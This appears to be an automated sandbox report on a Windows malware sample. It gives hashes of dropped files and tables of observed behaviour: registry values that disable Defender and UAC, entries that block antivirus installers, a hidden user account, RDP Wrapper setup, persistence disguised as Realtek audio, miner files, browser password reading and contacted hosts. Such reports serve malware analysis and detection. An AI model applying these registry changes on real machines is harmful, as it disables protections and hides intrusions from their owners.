C:\Users\Admin\AppData\Local\Temp\Cab5E66.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\ProgramData\Install\del.bat
| MD5 | ed57b78906b32bcc9c28934bb1edfee2 |
| SHA1 | 4d67f44b8bc7b1d5a010e766c9d81fb27cab8526 |
| SHA256 | c3a1bd76b8539fdf83b723f85b6ea7cd35104b0ec14429774059208d2660177d |
| SHA512 | d2a95257e37b4b4154aec2234e31423632598a870d2bb803ce27cb242d5bdff5ea1b7475577245f80d3ad069872e9ae2adcd05d5145e081db864185a5e7bda33 |
C:\Users\Admin\AppData\Local\Temp\Cab8AB5.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar8AC7.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Windows\System32\drivers\etc\hosts
| MD5 | 4fb01d026830587891a6d0b1f6928152 |
| SHA1 | e10bc0625f03b0a136b876c565a4d58d659ea078 |
| SHA256 | 805998929bc56fe52c1611ca4b68ffbf654e7e49dd2f0e212b9275ed4b176978 |
| SHA512 | 38f0c4e6e1482740c34f976330d174f2624459fcf534d351b056924ab89f347a939f7f067b5e352c1c307bb14bc145f6f0db2fd1d5344cd11e2ba74fa1ceda41 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 07:13
Reported
2024-06-19 07:16
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
145s
Command Line
Signatures
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Modifies visibility of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
RMS
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\regedit.exe | N/A |
Grants admin privileges
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
Possible privilege escalation attempt
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | C:\rdp\RDPWInst.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Stops running service(s)
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\Vegas.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | \??\c:\Programdata\Microsoft\Intel\Cheat64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\Logs.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winit.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winlog.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\MOS.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\winlogon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\Cheat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\P.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\R8.exe | N/A |
Cryptocurrency Miner
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
AutoIT Executable
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\System32\rfxvmt.dll | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\rutserv.pdb | C:\Programdata\Windows\rutserv.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\exe\rutserv.pdb | C:\Programdata\Windows\rutserv.exe | N/A |
| File opened for modification | C:\windows\SysWOW64\hs | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\windows\SysWOW64\hhsm | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\exe\rutserv.pdb | C:\Programdata\Windows\rutserv.exe | N/A |
| File opened for modification | C:\windows\SysWOW64\xmr64 | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\windows\SysWOW64\xmr | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\windowsnode | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\hhsm | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\min | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\hs_module | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\WindowsDefender | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\bd38e93c22ab359d615e7464fd252363_JaffaCakes118.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Programdata\Windows\winit.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Programdata\Windows\winit.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\programdata\microsoft\intel\MOS.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\MIME\Database | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage | C:\Programdata\Windows\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\ProgramData\Microsoft\Intel\winit.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\programdata\microsoft\intel\P.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\ProgramData\RealtekHD\taskhostw.exe | N/A |
Suspicious behavior: LoadsDriver
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Programdata\Windows\rfusclient.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Programdata\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
